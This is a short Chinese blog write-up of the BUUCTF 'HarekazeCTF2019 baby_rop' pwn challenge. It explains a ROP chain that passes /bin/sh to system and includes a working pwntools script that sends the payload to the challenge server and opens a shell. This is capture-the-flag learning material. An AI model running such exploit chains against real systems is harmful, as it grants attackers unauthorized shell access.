buuctf [HarekazeCTF2019]baby_rop
2020-05-07 04:25
1801 查看
可以在程序里找到binsh,ctrl+L,
程序本身有system函数
找到rop
修改system参数为/bin/sh,然后跳转到system运行就可以了,最后加一个假的返回地址
from pwn import *
from LibcSearcher import *
context.os='linux'
context.arch='amd64'
context.log_level='debug'
r = remote('node3.buuoj.cn',28862)
#r = process('./ciscn_2019_en_2')
#elf = ELF('./ciscn_2019_en_2')
bin_sh_addr = 0x601048
system = 0x400490
pop_di = 0x0000000000400683 # pop rdi ; ret
p = flat(['a'*0x10, 'b'*8, pop_di, bin_sh_addr, system, 0xdeadbeef])
r.sendline(p)
r.interactive()
Tower2358
原创文章 31获赞 1访问量 887
关注
私信
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 
相关文章推荐
- 【Writeup】BUUCTF_Pwn_[OGeek2019]babyrop
- buuctf bjdctf_2020_babyrop
- buuctf [HarekazeCTF2019]baby_rop2
- buuctf 极客大挑战 babysql
- 1.实验吧_ropbaby(西普杯CTF)_onegadget
- Defcon - 2015 - 初赛 - r0pbaby writeup
- 【3.24】学习笔记 --ROP
- 基于ret2libc3的简单ROP实验
- 【Writeup】BUUCTF_Web_高明的黑客
- 我的BABY开始做梦了,^_^(28周)
- [极客大挑战 2019]BabySQL(replace()的简单过滤)
- BabyLinux制作过程详解(转)
- BabyLinux制作过程详解
- [转-来自啊泰]推模式下dataset1下显示的是"...未找到项目..." 问题的解决 [http://www.cnblogs.com/babyt/archive/2005/04/15/138582.html]
- [英语阅读]The Baby Eagle 小鹰的故事
- take candy from a baby 唾手可得
- come on baby
- Linux baby rocker 源码
- POJ 2417 Discrete Logging 离散对数/BabyStep_GiantStep
- Baby-step giant-step